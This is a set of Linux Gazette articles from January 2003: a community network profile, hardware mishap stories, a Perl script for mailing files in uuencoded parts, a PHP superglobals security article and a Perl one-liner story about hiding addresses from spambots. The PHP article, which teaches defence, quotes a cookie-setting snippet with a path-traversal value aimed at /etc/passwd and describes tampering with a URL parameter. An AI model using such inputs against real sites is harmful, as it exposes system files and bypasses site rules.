• Mailing lists: Several mailing lists are run at ecol, the most important ones being the users' list and the admins' list.
• News: We offer access to all the es.comp.os.Linux.* newsgroups to anyone who wants to read them. That's one of the services we wanted EcolNet for, to make sure whoever wanted to read the groups had the chance to have a decent service.
• IRC: This is one of our favorites. Great fun at IRC.escomposLinux.org #escomposLinux, where we meet and chat about our stuff. Always nice to drop by.
• PGP keys: Here we keep our PGP and GnuPG keys.
• Time: At ntp.escomposLinux.org we keep a big clock to know what time it is.
• CVS: Some of our users work on different projects, so CVS is a great tool for them.
• Wiki: We have a little wiki that we use for different things, mainly for writing documentation when you just made someting work and you're still feel on fire  :)

Besides those services, www.escomposLinux.org holds a lot of information, like Linux related links, book reviews and helpful documentation. And constantly growing.

The services distribution varies from time to time, either when some machines join the EcolNet or when someone experiences problems, like too much bandwidth consumption or some real tragedy. One of our primary servers had a terrible crash featured by the electrical company not long ago. We learnt a few things from that.

We are specially proud of these "Star" features:

• Libertonia: A Linux weblog based on K5's Scoop. It started a few months ago and we have over 300 registered users today. Libertonia is Spanish for Freedonia, the imaginary country Groucho Marx ruled in "Duck Soup". Hence the penguin with a Groucho disguise as the logo. It's quite different from all other weblogs around, and this is why:
• Users must be registered to be able to post.
• As in K5, users vote on what gets published.
• We can censor news and comments we consider off-topic or impolite. Censoring has very bad connotations and everybody is against it, so maybe you'd prefer to call it moderation. We provide the service with our money and sweat. We don't want any trolls having fun at our cost. As of today, we've only had nice and dialogant participants around, and they like the way things are managed. We don't host banners, we don't need money, we don't need hits. Thus, we do choose to have just a group of selected people taking part in Libertonia. Althogh articles usually don't have many comments (so far) compared to other weblogs, the quality of comments is good enough to compensate this, and competition makes the quality of the articles grow. As of today, we never had a troll and everybody lives happily and cordially in Libertonia.
• The ecol comic strip: One of the most famous EcolNet services, Humor :) Originally in Spanish, now they are translated into English. They have become incredibly successful among the Spanish geeks, getting around 1000 visits daily, even though it's a weekly publication. Some popular weblogs link them, as well as scores of personal pages. As for the English version, over 100 people have subscribed to a mailing list, run by a guy called Simon, neither Spanish nor EcolNet-related, but still very nice :) Besides, the English version receives well over 100 visits/day. You might have already read some of them, if you're a regular Linux Gazette reader. [Like the one in this issue. --Editor] To deal with all that traffic, we have put up ten mirrors, which was kind of an interesting challenge. We still hope to be slashdotted someday and see how well we do. At EcolNet we like challenges. The comic strip is also EcolNet's "Poster Child", at least in Spain. By the way, I must disclose that I'm the proud father of the thing.
• Our news servers: We are especially proud of our news servers. They are difficult to put up and maintain (hey, we find it difficult!) Neverteless, they are the base of the escomposLinux proyect. We go the extra mile to take care of the news servers. Here you can see a scheme of the servers we have now running, and who is feeding us externally. Kudos go to those feeders: [Click for image].

Who takes care of the whole thing? Is there something like a president? Do you have an EcolNet king?

There's a lot of people involved in EcolNet, which makes things "interesting". Fortunately, EcolNet volunteers are always talkative and very nice, and it's more a pleasure than a hasle to deal with them. Nevertheless, whenever there's people involved, there's a need for some kind of structure. At EcolNet there's a core of people, basically the "Five Good Men", who take care of the baby. They hold the experience and the know-how. If you want, you can see them as Primus intern Pares, First among Equals.

I've already talked about censoring in Libertonia, and I'll keep on reviewing "nasty" words. Next one is "dictatorship". Let me tell a story I especially like. Plato the philosopher said in The Republic that the perfect form of government is the dictatorship of a wise man. Unluckily, that's not possible in real life, or is it? Well, I think we do have that: we have a few people that have never been elected, that usually say what's to be done or they just do it, and everybody's happy with it. And it's been like that for many years and we keep rolling on, better and better each day. The rest of the volunteers of course have an opinion, and it's taken into account. Everything is pretty democratic, or at least it looks like it. It's hard to fight when everybody is nice and has the same goals. We all know we ride the same boat. We want to keep the boat afloat and we know who is the most capable, so everybody works together, rowing in the same direction.

How does EcolNet's decision-making process work? We have the admin mailing list, the users mailing list, an internal weblog and an online poll. Usually, infrastructure stuff gets discussed in the admin mailing list, because users don't need to know or be bothered with technical details. The users mailing list is for when things affect all the EcolNet population, both those running machines and users who have projects or documentation hosted. For minor discussions, we tend to use the internal weblog and its poll.

In Memoriam

The EcolNet project is dedicated to Tas, one of the original "Five Good Men", now staying with $DEITY.

Written by Javier Malonda.

There's a lot of people who should be listed in the credits, but they want to be anonymous. Just read http://www.escomposLinux.org.

If you're curious, you can find the Dia source XML code of the diagrams, as well as the diagrams themselves, at http://helvete.escomposLinux.org/ecolnet/ .

 

---

Copyright © 2003, Javier Malonda. Copying license http://www.linuxgazette.com/copying.html
Published in Issue 86 of Linux Gazette, January 2003

---

...making Linux just a little more fun!

The Foolish Things We Do With Our Computers By Mike ("Iron") Orr

Floppy story

By Lorcan Mongey

Back in the days when we used 5.25" floppies, somebody spilled a mug of coffee over their floppy disc. Not unnaturally, it became unreadable. The problem here is not that the data has been destroyed, but the fabric lining of the floppy envelope becomes saturated and constantly re-applies a thin layer of coffee to the disc surface, preventing the data from being read. They brought it to me, so I cut open the envelope with scissors, removed the actual disc, rinsed it under a tap and dried it with paper towels. Then I cut open a spare floppy envelope (removing the unwanted disc), inserted the problem disc and put the whole lot in the drive. It worked perfectly, and we were able to copy the entire contents to safety before abandoning the floppy.

---

More luck than skill

By Morten Sickel

There's a Norwegian saying that goes, "Sometimes you may have more luck than skill." With a couple of exceptions, that has been my experience when doing stupid things with the computers.

I have studied chemistry, and as I studied, I had for a while a job as a kind of sysadmin for the computers the (other) students could use. Most of the machines were some great 386s with a whooping 4MB of RAM. At that time, we also got the first 486 PCs. In one of those, the floppy ceased working, but I knew what to do, as I had a couple of dead 386s in a storage. After a bit of Frankesteinification, I again had a 486 equipped with a floppy. I turned the power on and, oops, there went the blue smoke. It turned out that I had put on the power connection one pin too far to the left. Later, floppy power connectors have been altered so it is virtually impossible to repeat that stunt. Obiously, I have not been the only one...

At about the same time, a friend of mine (yes it is true, it is not me!) got hold of a 386sx that should replace his old 286. I was working together with him to get it all together, and in the end, it turned out that one of the screws had disappeared. We looked for it for a while, gave up, turned on the power and found it immediately, just by looking at the spot where the motherboard started to burn... After that, I have always been very careful collecting all screws and never turning on the power if any are still missing. Well, my friend shortly after got hold of a 486 motherboard and managed to collect 20MB of RAM from old PC at his job, so I don't think he was too unhappy with it at the end. I still remember the thrill of seeing that machine counting RAM during boot... At that time, my own 8088 never came pass 640k... :-)

On the other hand, what really has impressed me is the quality of IDE connectors. I don't know how many times I have connected them the wrong way around, without damaging anything. My last stunt connected two ingenious connections of pieces of hardware was just a few weeks ago. I got a few old SCSI disks from my friend with the burningly fast 386SX (no he does not have any more left now...). On one of them, there was a label on the top telling how to set the jumpers for master, slave or CS, so I thought 'OK, then this one is really an IDE drive, then I'll put it in another PC'. After a bit of fiddling I managed to get it in, but the PC did not recognice it and refused to boot from the other (known working) disk. I took it out again, and had a closer look at the jumpers, after a while I could see that even though the label on the top were mentioning master and slave, the jumpers themselves were labeled A0,A1,A2..... Then a closer examination revealed that the connector was broader than IDE and that some of the pins were slightly bent... I carefully bent the pins back, attached it to a SCSI chain, and saw it came up just beautifully. Occationally, luck is better than skill.

Morten Sickel, Drøbak Norway

---

The whirlybird CPU

By Raul Marusca

A decade ago I was working as a technician at a computer store. One day a customer bought a 387 mathematical coprocesator for his computer. He insisted on installing it himself. Two days after he come back and returned the chip (without the protective case), saying, "You sold me a broken device".

I responded, "But now is out of the protective cover, How we know it not was affected by an electostatic discharge?"

"I plugged it on the socket in all four possible ways and it was never detected by the BIOS nor by the software at all."

We were shocked. We hadn't imagined it was even possible to plug the copro in another way besides to matching the pin 1 mark on the chip with the mark on the motherboard!

It took us a long week to explain he that he broke the chip when he plug it in the wrong way for the first time, and that's not covered by the warranty.

[If you have a story about something foolish or ingenious you did to your computer, send it to gazette@ssc.com. -Iron.]

 

Mike is the Editor of Linux Gazette. You can read what he has to say on the Back Page of each issue. He has been a Linux enthusiast since 1991 and a Debian user since 1995. He is SSC's web technical coordinator, which means he gets to write a lot of Python scripts. Non-computer interests include Ska and Oi! music and the international language Esperanto. The nickname Iron was given to him in college--short for Iron Orr, hahaha.

---

Copyright © 2003, Mike ("Iron") Orr. Copying license http://www.linuxgazette.com/copying.html
Published in Issue 86 of Linux Gazette, January 2003

---

...making Linux just a little more fun!

How to E-mail an Encyclopedia By Graham Jenkins

Why Would You E-mail an Encyclopedia?

OK, so it doesn't have to be an encylopedia. It might be a movie. Or a large directory you have tarred and compressed. And you could of course transfer it using FTP. Or perhaps you couldn't. Your machine might live within a corporate LAN environment with no FTP access to the outside world. Or the destination machine may have FTP disabled for security purposes. An alternative is to encode the object to be transferred into a string of ASCII characters, and send it via e-mail. You can use the 'uuencode' utility to perform this encoding, or you can use Base64 Content Transfer Encoding as described in RFC 2045 "Multipurpose Internet Mail Extensions (MIME) Part One".

How Would You Package an Encyclopedia?

If you were physically mailing an encyclopedia, you might package it entirely within one carton. That would be a good solution, provided all mail handlers along the way would accept a carton of that size and weight. If that were not the case, then you would have to split the encyclopedia into multiple cartons of acceptable size and weight.

In a like manner, when we are e-mailing an encyclopedia, we need to ensure that the size of the e-mail message which contains it doesn't exceed any limits which might be encountered along the way. If that is not the case, then we need to split the message into multiple parts of acceptable size. This can be done in accordance with RFC 2046 "Multipurpose Internet Mail Extensions (MIME) Part Two".

In summary, if we follow the recommendations of RFC 2045 and RFC 2046, we should perform Base64 encoding on our entire encyclopedia, then split the result into as many parts as necessary. The parts to be mailed will then look something like this:

  From grahjenk@au1.ibm.com Tue Dec 31 13:14:34 2002
  Content-Disposition: inline
  Content-Transfer-Encoding: 7bit
  Content-Type: message/partial; id="300870"; number="1"
  Subject: Graham's Encylopedia
  
  owF1Vb+P3EQUPhLRrBSFlHQjRYCQsthe/1q7CNrbREjocnvK3hHREM3ac7fWeWfM
  zPh2L38ASomEIro0SNBBg2hBSDTwR0BBEwqQaFJF8J499tob0EjW7rzv+96b772x
   ...
  szJb9DUMvKdRUIV+RY5Xu3UkRQqvJCzdzHtHoQL36Ke6elnYLgwH8MfxCU9ymq1Y
  
  --
  From grahjenk@au1.ibm.com Tue Dec 31 13:14:34 2002
  Content-Disposition: inline
  Content-Transfer-Encoding: 7bit
  Content-Type: message/partial; id="300870"; number="9"; total="9"
  Subject: Graham's Encyclopedia
  
  dc45xuruv3m3e8z/OGRD6lxz13GC5m0XbXvcWlyFW4vxbSSK5KEoTOIIuxTFs2JK
  UnZKy1wTAV9TWr2dev7WrLbXkeOHUVQnjuyXEptwm3hBgfT43auvVh/v5mt+48pb
  n+09Hf7+5Nvyx5tf/fP4o+PJ398Xf958cW3v6ejzL17/9YPfPs4unv08efvr68O/
  njz/Fw==
  
  --

Another Way of Packaging an Encyclopedia

It's not always easy for a message recipient to assemble parts like those shown above in correct order, then strip out header lines and feed the parts into a Base64 decoding program. If he is using an old Unix machine, he may not actually have a Base64 decoder. If he is using a Microsoft machine, he might not be able to appropriately edit the message parts.

So an alternative mechanism is to break the encyclopedia into numbered parts, then separately uuencode each part for sending. Most versions of 'uudecode' are smart enough to strip out header lines. It even works with Microsoft Outlook.

The secret here is to number the component parts in such a fashion that they can easily be selected (e.g. by using 'cat') in the correct sequence, and fed to a pipe (e.g. for uncompress and untar operations) or output file. The output parts now look like:

  From grahjenk@au1.ibm.com Tue Dec 31 13:49:07 2002
  Subject: encyclo part 1/ size/sum 1024/16571
  
  begin 644 001_encyclo
  M<F]O=#IX.C`Z,3I3=7!E<BU5<V5R.B\Z+W-B:6XO<V@*9&%E;6]N.G@Z,3HQ
  M.CHO.@IB:6XZ>#HR.C(Z.B]U<W(O8FEN.@IS>7,Z>#HS.C,Z.B\Z"F%D;3IX
   ...
  M8W)E<',Z+V)I;B]K<V@*=V-O8F%T8V@Z>#HU,#(X.#HQ.D%L97@@=&AE(%=A
  B;FME<CHO97AP;W)T+VAO;64O=V-O8F%T8V@Z+V)I;B]K<P``
  `
  end
  
  --
  From grahjenk@au1.ibm.com Tue Dec 31 13:49:07 2002
  Subject: encyclo part 2/2 size/sum 945/12218
  
  begin 644 002_encyclo
  M:`IC-S0S-#0P.G@Z-38T-C,Z-3`P-#I!;F1R97<@3'5O;F<Z+VAO;64O861M
  M;W!E<F%T;W(Z+V5X<&]R="]H;VUE+V]P8U]O<#HO8FEN+W-H"F,Y,34W.3DZ
  M>#HU,#(Y,#HQ.CHO:&]M92]A9&UI;B]C.3$U-SDY.B]U<W(O8FEN+V)A<V@*
  `
  end
  
  --

You'll notice that we are now using just an upper-case character-set, and that it contains a number of bracket and other symbols. Some of the symbols don't map in an equivalent fashion into other character-set representations. That's why RFC 2045 recommends the use of Base64 instead of 'uuencode'.

The Encylopedia Packer

Here's the packaging program. For simplicity and generality, we use the alternative packaging scheme outlined above. Programs which do this have been around for a long time. They are usually written in 'C', although Bourne-Shell versions are available. And they usually write temporary files.

It is possible to write an elegant implementation of the packaging scheme using the Perl language, without using any temporary files. The resulting program is both simple and portable. So that's what we've done.

#!/usr/local/bin/perl -w
# @(#) filemail.pl      Breaks incoming stream into parts, then encodes
#                       each part and e-mails it to designated recipient.
#                       Vers. 2.05; Graham Jenkins, IBM GSA, December 2002.

use strict;             # Parts are encoded and sent via a double-buffer scheme.
use File::Basename;     # Uuencoding is used to reduce module dependence.
my  $PSize = 700;       # Default (input) part-size.
my  ($Count,$Sum,$Size,$Total,$InpBuf,$InpLen,$OutBuf,$j);

if ($#ARGV eq 2) { if ($ARGV[0] =~ m/^-\d+$/ ) { $PSize=0-$ARGV[0]; shift } } 

die "Usage: cat file  |".basename($0)." [-KbPerPart] destination filename\n".
    " e.g.: tar cf - .|".basename($0)." -64 smith\@popser.acme.com mydir.tar\n".
    "(Note: default un-encoded part size = $PSize","kb)\n"  if ($#ARGV ne 1);

open(INFILE,"-") || die "Can't read input!\n";
$Count = 0; $Total = "";# Loop until no further input available.

do { $InpLen = read(INFILE, $InpBuf, 1024 * $PSize);
     $Total  = $Count if $InpLen lt 1;
     do { $Size = length($OutBuf); 
          print STDERR "$ARGV[1] part $Count/$Total => $ARGV[0] $Size bytes\n";
          $Sum  = unpack("%32C*", $OutBuf);
          foreach $j (1,2) {$Sum = ($Sum & 0xffff) + int($Sum/0x10000)}
          open(PIPE, "| Mail -s" .
            "'$ARGV[1] part $Count/$Total size/sum $Size/$Sum' $ARGV[0]");
          $j = $Count ; while (length($j) < 3 ) { $j = "0" . $j }
          $j = dirname($ARGV[1])."/".$j if dirname($ARGV[1]) ne "."; 
          print PIPE "begin 644 ",$j,"_", basename($ARGV[1]),"\n",
            pack("u",$OutBuf),"\`\nend\n";
          close(PIPE)                                   } if $Count gt 0;
     $Count++; $OutBuf = $InpBuf                          } until $InpLen lt 1;

Perl lends itself to this application through the form of its 'read' statement, which allows us to specify the number of bytes which it should try to acquire into a designated string. As can be seen, we just keep reading from standard input until an empty string is returned in '$InpBuf'. Each time we get a non-empty string, we uuencode whatever content is currently in '$OutBuf' and push it into a mail program. We then store the contents of '$InpBuf' in '$OutBuf' ready for our next iteration.

Perl is able to perform a uuencode operation on a string by using its 'pack' statement as shown with a 'u' parameter; no additional modules are required. It's not really necessary - but we also take advantage of the 'unpack' statement's characteristics to compute a checksum on each part as it is sent.

You may observe that we actually open a pipe into the Unix/Linux 'Mail' program to handle our outgoing mail. For greater portability, we could install and use the Net::SMTP module.

The program can be invoked with an optional part-size parameter to adjust its default un-encoded part-size limit of 700kb.

Programs Which Do Similar Things

Some of you may recognize that this sort of message-splitting is exactly the sort of thing we did in "Secure Printing with PGP". For those of you who are interested, there are updated versions of the programs presented therein at: "CPAN Scripts Repository". Those programs use the RFC-recommended "Base64-encode then split" methodology.

An earlier article "A Linux Client for the Brother Internet Print Protocol" included a shell script which used a "split then send parts" methodology; this also used Base64 encoding.

 

Graham is a Unix Specialist at IBM Global Services, Australia. He lives in Melbourne and has built and managed many flavors of proprietary and open systems on several hardware platforms.

---

Copyright © 2003, Graham Jenkins. Copying license http://www.linuxgazette.com/copying.html
Published in Issue 86 of Linux Gazette, January 2003

---

...making Linux just a little more fun!

Security with PHP Superglobals By David Lechnyr

"Avoid strange women and temporary variables." -- Anonymous

A few years ago, my wife and I decided to go on a skiing trip up north. To reserve skiing equipment, you had to give 24 hours advance notice using the ski lodge's on-line website. The catch was that my wife had asked me to make the reservations 23 hours before the deadline.

So I got to thinking, and examined the online website, which would not let you make any reservations within the 24 hour timeframe. However, once you selected an appropriate date, I noticed that the URL was:

https://www.somewhere.com/reservations.php?date=01-23-01

It occurred to me that, while they had locked down security on what dates I could choose from, the final value was placed into a GET statement at the end of the web address. I modified the web address to use "date=01-22-01" and indeed, our skies were waiting for us first thing the next morning (we paid for them, of course).

This innocent yet practical example is just one of the dangers we have to be aware of when using any programming language that can be used in ways that we did not intend, which leads us into our discussion on PHP Superglobals.

Forms

To understand Superglobals, it is critical that you understand how data is passed from one web page to another (e.g., forms). Specifically, you must be aware of two methods known as GET and POST. You should also probably be familiar with the HTML <FORM> statement (a good reference is http://www.w3.org/TR/html401/interact/forms.html).

You've probably seen something like this before:

<form name="form1" method="post" action="process.php">
   <p>Please enter your name:</p>
   <p><input type="text" name="yourname" /></p>
   <p><input type="button" name="Submit" value="Submit" /></p>
</form>

This is standard, nothing-fancy HTML form code that asks for some information and then submits the data to the file "process.php" .  The critical bit here is the method declaration, which tells the form how to submit the data, for which we need to digress for a moment or two (hold your breath):

For those that recall the early days of HTML, forms were provided by means of the <ISINDEX> HTML tag. By inserting this tag into the HEAD of your HTML documents, a text field appeaed where you could fill out input. As the new HTML+ standard evolved, a <FORM> tag was designed and could be used with a METHOD attribute of GET, POST, or PUT.  So, this leaves us with a few different ways to send our data.

GET

With GET, variables and their values are sent in the header of the URL request appended as part of the URL itself.  The limitation is that web addresses (URLs) are limited to 8,192 characters; if the amount of data is too long, it will be truncated. Also, even with an SSL connection, the data is not encrypted since it is part of the web address.

For example, a web page might have a form statement like this:

<form name="form1" method="get" action="process.php">
   <p>Please enter your name, e-mail address, and a comment:</p>
   <p><input type="text" name="yourname" /></p>
   <p><input type="text" name="email" /></p>
   <p><input type="text" name="comment" /></p>
   <p><input type="button" name="Submit" value="Submit" /></p>
</form>

When you clicked Submit, your web browser would take the values you filled out in the form and redirect you to this web address:

http://www.fluffygerbil.com/process.php?yourname=fred+smith&email=fred@nowhere.com&comment=I+have+no+comment

Notice how the values of the form are part of the web address itself? That's the essence of GET.

For the curious, what is actually sent in the raw HTTP transmission to accomplish this transaction is:

GET /process.php?yourname=fred+smith&email=fred@nowhere.com&comment=I+have+no+comment HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)
Host: www.fluffygerbils.com
Connection: keep-alive

POST

With POST, the variables and their values are sent in the body of the URL request, not the header.  The advantages of this type of data transmission is that there is no limit to the size of the data being sent since it is contained in the body of the HTTP request, not the header.  Also, if you're using an SSL connection, the data will be encrypted too, what a deal.  For example, a web page that has a form statement like:

<form name="form1" method="post" action="process.php">
   <p>Please enter your name, e-mail address, and a comment:</p>
   <p><input type="text" name="yourname" /></p>
   <p><input type="text" name="email" /></p>
   <p><input type="text" name="comment" /></p>
   <p><input type="button" name="Submit" value="Submit" /></p>
</form>

When you clicked Submit, your web browser would take the values you filled out in the form and redirect you to this web address:

http://www.fluffygerbil.com/process.php

Notice how the values of the form are not part of the web address itself? That's the essence of PUT.

For the curious, what is actually sent in the raw HTTP transmission to accomplish this transaction is:

POST /process.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)
Host: www.fluffygerbils.com
Content-Length: 94
Pragma: no-cache
Connection: keep-alive

yourname=fred+smith
email=fred@nowhere.com
comment=I+have+no+comment

So What?

So, why is all this background information useful? When you install PHP 4.2.2 or later, you might happen to notice that when compiling PHP, it states:

+--------------------------------------------------------------------+
|                          *** NOTE ***                              |
|            The default for register_globals is now OFF!            |
|                                                                    |
| If your application relies on register_globals being ON, you       |
| should explicitly set it to on in your php.ini file.               |
| Note that you are strongly encouraged to read                      |
| http://www.php.net/manual/en/security.registerglobals.php          |
| about the implications of having register_globals set to on, and   |
| avoid using it if possible.                                        |
+--------------------------------------------------------------------+

Which means that PHP will be ultra-paranoid about the data that is passed to it, and will require that you state which method the data should be coming from.  Also, you should be aware that there's more ways to send data to your PHP pages than just via GET and POST:

Superglobals

Which brings us to Superglobals, a relatively new concept to PHP. For example, the above diagram presents a slight problem: If you're working with the variable $yourname, how do you know that during your script it hasn't been redefined by one of these six other methods of variable assignment by someone attempting to hack into your script? For example, imagine having someone who has managed to upload a PHP script to your webserver that performs the following (php exploit by Daniel Phoenix):

<?php
setcookie("test","../../../../../../etc/passwd");
echo "cookie inserted";
?>

Wouldn't it be great to have a way to isolate variables based on how the data gets assigned to it in the first place? Superglobals allow you to specify which variables received by a specific method should be used.

Superglobals are PHP's attempt at helping you determine where a particular value comes from. If you haven't heard of this new feature as of PHP 4.1.0, you'll want to start adapting to it. Most PHP training books don't touch this subject, so you will need to be aware of how to transition to this new input method. Ultimately, you should re-visit your /usr/local/lib/php.ini file and make the following change:

register_globals = Off

This will prevent the ability for any user-submitted variable to be injected into your PHP code and can reduce the amount of variable poisoning a potential attacker may inflict. They will have to take the additional time to forge submissions, and your internal variables are effectively isolated from user submitted data. If a user then tried to fill out a form, the server wouldn't assign any data to the global variables $name, $email, or $comment. Instead, it would divide up the data into the following hashed arrays:

$_POST['name']
$_POST['email']
$_POST['comment']

The main Superglobal arrays are:

1. $_GET['variable'] - Variables provided to the script via HTTP GET. Analogous to the deprecated HTTP_GET_VARS array
2. $_POST['variable'] - Variables provided to the script via HTTP POST. Analogous to the deprecated $HTTP_POST_VARS array

The other, less-common Superglobal arrays are:

1. $_COOKIE['variable'] - Variables provided to the script via HTTP cookies. Analogous to the deprecated $HTTP_COOKIE_VARS array
2. $_REQUEST['variable'] - Variables provided to the script via any user input mechanism (GET, POST, COOKIE) and which therefore cannot be trusted.
3. $_GLOBALS['variable'] - Contains a reference to every variable which is currently available within the global scope of the script. The keys of this array are the names of the global variables.
4. $_SERVER['variable'] - Variables set by the web server or otherwise directly related to the execution environment of the current script. Analogous to the deprecated $HTTP_SERVER_VARS array
5. $_FILES['variable'] - Variables provided to the script via HTTP post file uploads. Analogous to the deprecated $HTTP_POST_FILES array
6. $_ENV['variable'] - Variables provided to the script via the environment. Analogous to the deprecated $HTTP_ENV_VARS array
7. $_SESSION['variable'] - Variables which are currently registered to a script's session. Analogous to the deprecated $HTTP_SESSION_VARS array

For more details, see http://www.php.net/manual/en/reserved.variables.php.

So instead of $name being set to "John", you would either have $_GET['name'] = "John" or possibly $_POST['name'] = "John" depending on how the form data was submitted. The advantage is that you will know:

1. $name can never be faked; if your script sets its value, that's the value!
2. The $_GET and $_POST arrays help you to determine if the user appended the data as part of the URL or as part of the request body; therefore you don't have to worry about having a form accepting POST data and having the values change by someone sending a hacked URL with GET data appended to the URL. This will make sense shortly, so hang on...
3. These 'superglobals' allow you to 'compartmentalize' not only your variable's values, but how the values were provided to the server in the first place. Someone attempting to hack into your server will have a very difficult time bypassing this.

Final Thoughts

Programming with PHP can be a frustrating experience as of late. Security measures prevent data from being easily assigned to variables, ISP's typically implement PHP without consideration for their audience, and newcomers to PHP tend to be taken aback by such terms as GET, POST, Superglobals, and so forth. However, a little knowledge can go a long way, and hopefully this article has helped you in your quest.

This document was prepared based on PHP 4.3.0.

Additional Resources

• On the Security of PHP, by Jordan Dimov
• A Study In Scarlet: Exploiting Common Vulnerabilities in PHP Applications, by Shaun Clowes

This document was lovingly handcrafted on a Dell Latitude C400 laptop running Slackware Linux 8.1.

 

David is a Network Manager at the Human Resources department of the University of Oregon. He holds a Master's Degree in Social Work along with his MCSE+I, CNE, and CCNA certifications. He has been working with Linux for the past six years, with an emphasis on systems security, network troubleshooting, and PHP/MySQL integration.

---

Copyright © 2003, David Lechnyr. Copying license http://www.linuxgazette.com/copying.html
Published in Issue 86 of Linux Gazette, January 2003

---

...making Linux just a little more fun!

Perl One-Liner of the Month: The Case of the Evil Spambots By Ben Okopnik

A REPORTER'S NOTE

To forestall some sure-to-happen complaints, I'd like to underscore the necessity of having the current version of Perl (at least 5.8.0, as of this writing) in order to play with the scripts presented in these articles. One-liners, to a far greater degree than proper scripts, rely on new and unusual language features, and languages tend to "grow" new features and drop old, outdated ones as version numbers rise. Perl, heading for its 17th year of growth and development, is no exception.

One of a number of possible problems with one-liners is fragility, especially in those (many of them) which are dependent on cryptocontext, side effects, and undocumented features, which are likely - in fact, are certain - to change without notice. One-liners are hacks which often demonstrate some clever twist or feature, which encourages the use of all of the above. Remember - these are fun toys which (hopefully) lead to a better understanding of Perl; trying to use them as you would robust, solid code would be a serious error. If you don't understand the basics of Perl, this is not the place to start.
 

Debugging is twice as hard as writing the code in the first place. 
Therefore, if you write the code as cleverly as possible, you are,
by definition, not smart enough to debug it.
 -- Brian W. Kernighan

Caveat Lector (Let the reader beware).

Ben Okopnik
On board S/V "Ulysses", Saint Augustine, Florida

---

Frink Ooblick had fallen asleep at the keyboard. He had been alternately playing and trying to puzzle out the number-guessing game that Woomert had written (the first had proven easy, but the second still eluded him); in fact, his last unfinished game was still visible on the screen:

perl -wlne'BEGIN{$b=rand$=}$a=qw/Up exit Down/[($_<=>int$b)+1];print eval$a'
50
Down
25
Up
37
Up
44
Up

What was the secret? How did it work? [1] Frink's dreams were full of floating bits of code which spiraled off into the distance or mutated into monstrous shapes, threatening to consume the world. The hand shaking his shoulder, waking him, was therefore a welcome relief. Woomert stood at his side, looking impatient.

 - "Wake up, Frink, wake up! The game's afoot, you slug-a-bed; let's go!"

 - "Uh... Erm... I'm, uh, awake. What's up?"

 - "In the living room. Come on, come on, there's not a moment to lose!"

Frink's first sight of their visitor brought him to a stop. Used to dealing with the working crowd - sysadmins, techs, etc. - he had expected the usual scruffy-and-competent look, perhaps complete with hiking boots; what greeted his eyes was a fellow in a pinstripe suit, crisp white shirt, a red "power" tie, and lacquered black shoes. He had been impatiently pacing the floor, and brightened up considerably at the sight of Frink.

 - "Ah, this must be the second team member in your organizational hierarchy! Excellent; now, we can get into actualizing the power strategies that will reorganize this, erm, unpredicted opportunity into the profit slot on the balance sheet. All right, here's how we wind-tunnel this: the securitization of the computing resources is predicated on leveraging..."

Keeping a cautious eye on their visitor, Frink prison-whispered to Woomert: "What's he saying? And what language is it in?"

 - "It's Marketroid. You need to learn at least the basics of it; not that it's spoken by the people who sign the checks - they don't have much time for that sort of thing - but you're going to run into it in the business world, and it's best to be prepared. Usually, though, most of these people can still speak English; let's see if this fellow remembers how. Oh, Mr. Wibbley!"

Their visitor had just finished what he obviously considered an explanation of the problem, had switched off the overhead LCD projector, put away his laser pointer, and was looking at them in an expectant manner. Clearly, he had heard of Woomert's reputation and was relying on the famous Hard-Nosed Computer Detective to deal with... well, whatever it was.

 - "Mr. Wibbley - that was an excellent presentation, but I wonder if you could restate the problem in more basic terms for my assistant here. I'm afraid he's not up on proper business terminology, and has missed the more subtle points."

Their visitor heaved a sigh, and dropped into the nearby easy chair.

 - "Oh, sure. You know, they were going to send one of the system administrators to talk to you, but of course I insisted on doing the presentation myself as soon as I heard about it. After all, one of them wouldn't have even thought of using that textured salmon-and-peach background on the slides, and that's all the rage these days! Anyway, I did get a note from him that explains it in his own words; it's crude and unsophisticated, not at all proper marketing technique, but I suppose you fellows will understand it..."

The crumpled and coffee-stained napkin, most of which was covered with calculations, reminders, and something that looked like firewall rules, contained a short note framed with a red marker pen:
 

Woomert, spambots are harvesting the e-mail addresses on our website (we've tagged them with the "plus hack", [2] so we know where it's coming from); the amount of spam we're getting is growing by leaps and bounds. We need to have the addresses out there - it's our contact info, site problem reports, etc. - but we've got to stop the 'bots somehow! I've already written the CGI to handle the hot links, but we need to have the actual addresses displayed on the pages, and the 'bots are getting those. Any ideas? The page is at http://xxxxxxxxxxxx.xxx. I've created an account for you; just go to ssh://xxxxxxxxx.xxx/xxx, password 'xxxxxxxxxx'. Thanks!   - Int Main

After Woomert had ushered out their visitor (and reassured him that, indeed, the salmon-and-peach background was delightful), he returned to the living room where Frink awaited him.

 - "What are you going to do, Woomert? Any plans?"

 - "Yes; let's take a peek at their website, then get out there and look around. It's a mistake to make decisions ahead of your facts, and we have few facts at hand."

...

Once again, Woomert and Frink found themselves surrounded by the familiar sights and sounds of a working web site. They could see the Web server easily spawning off threads without significantly affecting CPU load; clearly, the local sysadmin had installed mod_perl [3]. Here and there, data streams whisked by, and everything moved like a smoothly-oiled machine.

A sudden shadow made Frink look up. "What the..." Before he could go any further, a horrifying creature, all tentacles, lenses, and evil intent [4] leaped upon the scene, sucked up a copy of every HTML file at once, and was gone in a blink.

 - "What was that, Woomert - a spambot?"

 - "Yep. These things traverse the Net, collecting e-mail addresses and reporting them to their scummy spammer masters. Given the nature of the Net, you can't stop them - but you can make them much less effective. Spammers are stupid, their bots even more so, and that's what we're going to rely on. Mind you, whatever we do is only going to be a temporary solution; eventually, spammers (or at least their hired techie help) will catch on to this particular method - but by then, we'll implement other solutions."

Walking up to a convenient terminal, Woomert slipped on his favorite typing gloves and fired off a rapid volley.

perl -MRFC::RFC822::Address=valid -wne'/[\w-]+@[\w.-]+/||next;print valid$&' *html

A line of '1's appeared on the screen; Woomert smiled and his fingers again flew over the keyboard.

perl -i -wlpe's=[\w-]+@[\w.-]+=join"",map{sprintf"&#%s;",ord}split//,$&=e' *html

This time, there was no output; however, Woomert looked satisfied. He quickly shot off an email to the local sysadmin that contained some instructions and included a shorter version of the last one-liner -

perl -we'map{printf"&#%s;",ord}split//,pop' user@host.com

- "All right-o, Frink; our work here is done. Home, here we come!"

...

